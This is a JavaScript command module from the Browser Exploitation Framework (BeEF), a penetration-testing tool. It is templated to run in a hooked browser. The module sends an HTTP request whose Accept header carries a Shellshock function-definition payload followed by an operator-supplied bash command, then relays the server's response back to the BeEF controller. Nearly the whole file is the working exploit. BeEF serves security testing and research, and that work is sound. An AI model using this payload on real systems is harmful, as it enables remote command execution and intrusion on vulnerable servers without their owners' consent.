1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function () {
8
    try {
9
        var target = "<%=@Target%>";
10
        var command = "<%=@Bash_Command%>";
11
        var method = "<%=@method%>";
12
        var xhr = new XMLHttpRequest();
13
        xhr.open(method, target, true);
14
        xhr.onload = function () {
15
        };
16
        xhr.onreadystatechange = function () {
17
            if (xhr.readyState == 4 && xhr.status == 200) {
18
                beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);
19
            }
20
        }
21
        xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);
22
        xhr.send(null);
23
    } catch (e){
24
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
25
    }
26
});
27

28